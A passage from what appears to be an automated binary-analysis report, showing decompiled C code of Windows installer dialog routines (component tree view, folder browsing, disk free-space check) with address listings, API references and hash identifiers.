											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79f564;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79f578;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79f564 = _t315;
								 *0x79f578 = _t315;
								 *0x7a2fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79f578;
									_t196 =  *0x7a2fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a2fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a2fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79f578);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f564 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DA7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79f578 + _t318 * 4) = _t274;
									_t288 =  *( *0x79f578 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a2fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DDC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DDC(_v12);
								L89:
								return E00403E0E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                          0x004046c5
                                                                          0x004046cb
                                                                          0x004046cd
                                                                          0x004046d3
                                                                          0x004046d9
                                                                          0x004046e6
                                                                          0x004046ef
                                                                          0x004046f2
                                                                          0x004046f5
                                                                          0x00404916
                                                                          0x0040491d
                                                                          0x00404931
                                                                          0x0040491f
                                                                          0x00404921
                                                                          0x00404924
                                                                          0x00404925
                                                                          0x0040492c
                                                                          0x0040492c
                                                                          0x0040493d
                                                                          0x0040494b
                                                                          0x0040494e
                                                                          0x00404964
                                                                          0x004049dc
                                                                          0x004049df
                                                                          0x004049e1
                                                                          0x004049eb
                                                                          0x004049f9
                                                                          0x004049f9
                                                                          0x004049fb
                                                                          0x00404a05
                                                                          0x00404a0b
                                                                          0x00404a2c
                                                                          0x00404a0d
                                                                          0x00404a1a
                                                                          0x00404a1a
                                                                          0x00404a0b
                                                                          0x00404a05
                                                                          0x00000000
                                                                          0x004049df
                                                                          0x00404969
                                                                          0x00404974
                                                                          0x00404979
                                                                          0x00404980
                                                                          0x00404987
                                                                          0x00404991
                                                                          0x00404991
                                                                          0x00404995
                                                                          0x0040499a
                                                                          0x0040499f
                                                                          0x004049b5
                                                                          0x004049a1
                                                                          0x004049a1
                                                                          0x004049a9
                                                                          0x004049b0
                                                                          0x004049ab
                                                                          0x004049ab
                                                                          0x004049ab
                                                                          0x004049a9
                                                                          0x004049b9
                                                                          0x004049bb
                                                                          0x004049c9
                                                                          0x004049ca
                                                                          0x004049d6
                                                                          0x004049d9
                                                                          0x004049d9
                                                                          0x0040499a
                                                                          0x00000000
                                                                          0x00404987
                                                                          0x0040496b
                                                                          0x00404972
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404a2f
                                                                          0x00404a2f
                                                                          0x00404a36
                                                                          0x00404aaa
                                                                          0x00404ab1
                                                                          0x00404abd
                                                                          0x00404abd
                                                                          0x00404ac6
                                                                          0x00404ac8
                                                                          0x00404acf
                                                                          0x00404ad2
                                                                          0x00404ad2
                                                                          0x00404ad8
                                                                          0x00404adf
                                                                          0x00404ae2
                                                                          0x00404ae2
                                                                          0x00404ae8
                                                                          0x00404aee
                                                                          0x00404af4
                                                                          0x00404af4
                                                                          0x00404b01
                                                                          0x00404c4e
                                                                          0x00404c55
                                                                          0x00404c72
                                                                          0x00404c78
                                                                          0x00404c8a
                                                                          0x00404c8a
                                                                          0x00000000
                                                                          0x00404b07
                                                                          0x00404b09
                                                                          0x00404b11
                                                                          0x00404b15
                                                                          0x00404b15
                                                                          0x00404b1d
                                                                          0x00404b5e
                                                                          0x00404b60
                                                                          0x00404b70
                                                                          0x00404b73
                                                                          0x00404b78
                                                                          0x00404b7f
                                                                          0x00404b82
                                                                          0x00404c24
                                                                          0x00404c2a
                                                                          0x00404c38
                                                                          0x00404c49
                                                                          0x00404c49
                                                                          0x00000000
                                                                          0x00404c38
                                                                          0x00404b88
                                                                          0x00404b8b
                                                                          0x00404b91
                                                                          0x00404b96
                                                                          0x00404b98
                                                                          0x00404b9a
                                                                          0x00404ba0
                                                                          0x00404ba7
                                                                          0x00404bac
                                                                          0x00404bb3
                                                                          0x00404bb6
                                                                          0x00404bb6
                                                                          0x00404bbd
                                                                          0x00404bc9
                                                                          0x00404bcd
                                                                          0x00404bcf
                                                                          0x00404bcf
                                                                          0x00404bbf
                                                                          0x00404bc1
                                                                          0x00404bc1
                                                                          0x00404bef
                                                                          0x00404bfb
                                                                          0x00404c0a
                                                                          0x00404c0a
                                                                          0x00404c0c
                                                                          0x00404c0f
                                                                          0x00404c18
                                                                          0x00000000
                                                                          0x00404b1f
                                                                          0x00404b2a
                                                                          0x00404b2d
                                                                          0x00404b32
                                                                          0x00404b34
                                                                          0x00404b38
                                                                          0x00404b48
                                                                          0x00404b52
                                                                          0x00404b54
                                                                          0x00404b57
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404b3a
                                                                          0x00404b3a
                                                                          0x00404b40
                                                                          0x00404b42
                                                                          0x00404b42
                                                                          0x00404b43
                                                                          0x00404b44
                                                                          0x00000000
                                                                          0x00404b3a
                                                                          0x00404b1d
                                                                          0x00404b01
                                                                          0x00404a3e
                                                                          0x00000000
                                                                          0x00404a54
                                                                          0x00404a5e
                                                                          0x00404a63
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404a75
                                                                          0x00404a7a
                                                                          0x00404a86
                                                                          0x00404a86
                                                                          0x00404a88
                                                                          0x00404a97
                                                                          0x00404a99
                                                                          0x00404aa0
                                                                          0x00404aa3
                                                                          0x00000000
                                                                          0x00404aa3
                                                                          0x00404a3e
                                                                          0x004046fb
                                                                          0x00404700
                                                                          0x0040470a
                                                                          0x0040470b
                                                                          0x00404714
                                                                          0x0040471f
                                                                          0x0040473a
                                                                          0x0040474c
                                                                          0x00404751
                                                                          0x0040475c
                                                                          0x00404765
                                                                          0x0040477a
                                                                          0x0040478b
                                                                          0x00404798
                                                                          0x00404798
                                                                          0x0040479d
                                                                          0x004047a3
                                                                          0x004047a5
                                                                          0x004047a8
                                                                          0x004047ad
                                                                          0x004047b2
                                                                          0x004047b4
                                                                          0x004047b4
                                                                          0x004047b7
                                                                          0x004047b8
                                                                          0x004047d4
                                                                          0x004047d4
                                                                          0x004047d6
                                                                          0x004047d7
                                                                          0x004047dc
                                                                          0x004047df
                                                                          0x004047e2
                                                                          0x004047e6
                                                                          0x004047eb
                                                                          0x004047f0
                                                                          0x004047f4
                                                                          0x004047f9
                                                                          0x004047fe
                                                                          0x00404800
                                                                          0x00404808
                                                                          0x004048d2
                                                                          0x004048e5
                                                                          0x00000000
                                                                          0x0040480e
                                                                          0x00404811
                                                                          0x00404814
                                                                          0x00404817
                                                                          0x00404817
                                                                          0x0040481d
                                                                          0x00404823
                                                                          0x00404826
                                                                          0x0040482c
                                                                          0x0040482d
                                                                          0x00404832
                                                                          0x0040483b
                                                                          0x00404842
                                                                          0x00404845
                                                                          0x00404848
                                                                          0x0040484b
                                                                          0x00404887
                                                                          0x004048b0
                                                                          0x00404889
                                                                          0x00404896
                                                                          0x00404896
                                                                          0x0040484d
                                                                          0x00404850
                                                                          0x0040485f
                                                                          0x00404869
                                                                          0x00404871
                                                                          0x00404878
                                                                          0x00404880
                                                                          0x00404880
                                                                          0x0040484b
                                                                          0x004048b6
                                                                          0x004048b7
                                                                          0x004048c3
                                                                          0x004048c3
                                                                          0x004048d0
                                                                          0x004048eb
                                                                          0x004048ef
                                                                          0x0040490c
                                                                          0x00404911
                                                                          0x00404914
                                                                          0x00000000
                                                                          0x004048f1
                                                                          0x004048f6
                                                                          0x004048ff
                                                                          0x00404c8c
                                                                          0x00404c9e
                                                                          0x00404c9e
                                                                          0x004048ef
                                                                          0x00000000
                                                                          0x004048d0
                                                                          0x00404808

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 004046BE
                                                                          • GetDlgItem.USER32 ref: 004046CB
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                                                          • LoadBitmapA.USER32 ref: 0040472A
                                                                          • SetWindowLongA.USER32 ref: 0040473D
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                                                          • DeleteObject.GDI32(?), ref: 0040479D
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                                                          • GetWindowLongA.USER32 ref: 004048D7
                                                                          • SetWindowLongA.USER32 ref: 004048E5
                                                                          • ShowWindow.USER32(?,00000005), ref: 004048F6
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                                                          • GlobalFree.KERNEL32 ref: 00404AE2
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                                                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                                                          • ShowWindow.USER32(?,00000000), ref: 00404C78
                                                                          • GetDlgItem.USER32 ref: 00404C83
                                                                          • ShowWindow.USER32(00000000), ref: 00404C8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N
                                                                          • API String ID: 1638840714-813528018
                                                                          • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                          • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                                                          • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                          • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E004045FA(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E0040521C(0, _t110);
								E004054CC(_t151);
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);
					E00403DDC(_t144);
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}




































                                                                          0x004041eb
                                                                          0x004041f2
                                                                          0x004041fe
                                                                          0x0040420c
                                                                          0x00404214
                                                                          0x00404218
                                                                          0x0040421e
                                                                          0x0040421e
                                                                          0x0040422a
                                                                          0x004042a4
                                                                          0x004042ab
                                                                          0x00404377
                                                                          0x0040437e
                                                                          0x0040438d
                                                                          0x0040438d
                                                                          0x00404391
                                                                          0x00404397
                                                                          0x0040439a
                                                                          0x004043a7
                                                                          0x004043a9
                                                                          0x004043a9
                                                                          0x004043b7
                                                                          0x004043bd
                                                                          0x004043c4
                                                                          0x004043c6
                                                                          0x004043c6
                                                                          0x004043d3
                                                                          0x004043df
                                                                          0x00404403
                                                                          0x00404414
                                                                          0x0040441a
                                                                          0x0040441c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404422
                                                                          0x00404422
                                                                          0x00404430
                                                                          0x00000000
                                                                          0x004043e1
                                                                          0x004043e4
                                                                          0x004043e8
                                                                          0x004043ec
                                                                          0x004043ed
                                                                          0x004043f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004043fa
                                                                          0x00404432
                                                                          0x00404432
                                                                          0x00404439
                                                                          0x00404442
                                                                          0x00404444
                                                                          0x00404444
                                                                          0x00404456
                                                                          0x00404460
                                                                          0x00404468
                                                                          0x0040447e
                                                                          0x0040446a
                                                                          0x0040446e
                                                                          0x0040446e
                                                                          0x00404468
                                                                          0x00404483
                                                                          0x00404488
                                                                          0x0040448d
                                                                          0x00404496
                                                                          0x00404496
                                                                          0x0040449f
                                                                          0x004044a1
                                                                          0x004044a1
                                                                          0x004044ad
                                                                          0x004044b5
                                                                          0x004044bf
                                                                          0x004044bf
                                                                          0x004044c4
                                                                          0x00000000
                                                                          0x004044c4
                                                                          0x004043df
                                                                          0x00404380
                                                                          0x00404387
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404387
                                                                          0x004042b1
                                                                          0x004042b7
                                                                          0x004042d1
                                                                          0x004042d6
                                                                          0x004042e0
                                                                          0x004042e7
                                                                          0x004042ec
                                                                          0x004042f6
                                                                          0x004042f9
                                                                          0x004042fc
                                                                          0x00404303
                                                                          0x0040430b
                                                                          0x0040430e
                                                                          0x00404312
                                                                          0x00404319
                                                                          0x00404321
                                                                          0x00404370
                                                                          0x00404323
                                                                          0x00404324
                                                                          0x0040432a
                                                                          0x00404334
                                                                          0x0040433c
                                                                          0x0040433e
                                                                          0x0040433f
                                                                          0x00404341
                                                                          0x00404347
                                                                          0x00404355
                                                                          0x00404359
                                                                          0x00404359
                                                                          0x00404355
                                                                          0x0040435e
                                                                          0x00404369
                                                                          0x00404369
                                                                          0x00404321
                                                                          0x00000000
                                                                          0x004042d6
                                                                          0x004042c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004042ca
                                                                          0x00000000
                                                                          0x0040422c
                                                                          0x00404237
                                                                          0x00404240
                                                                          0x0040424d
                                                                          0x0040424d
                                                                          0x00404257
                                                                          0x0040425c
                                                                          0x00404265
                                                                          0x00404268
                                                                          0x0040426d
                                                                          0x00404275
                                                                          0x00404278
                                                                          0x0040427d
                                                                          0x00404283
                                                                          0x00404292
                                                                          0x00404299
                                                                          0x004044ca
                                                                          0x004044dc
                                                                          0x004044dc
                                                                          0x004042a2
                                                                          0x00000000
                                                                          0x004042a2

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 00404230
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                                                          • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                                                          • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                                                          • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                                                          • SetDlgItemTextA.USER32 ref: 00404369
                                                                            • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                            • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                            • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                          • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                                                          • SetDlgItemTextA.USER32 ref: 0040447E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                          • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                                                          • API String ID: 2007447535-1909522251
                                                                          • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                          • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
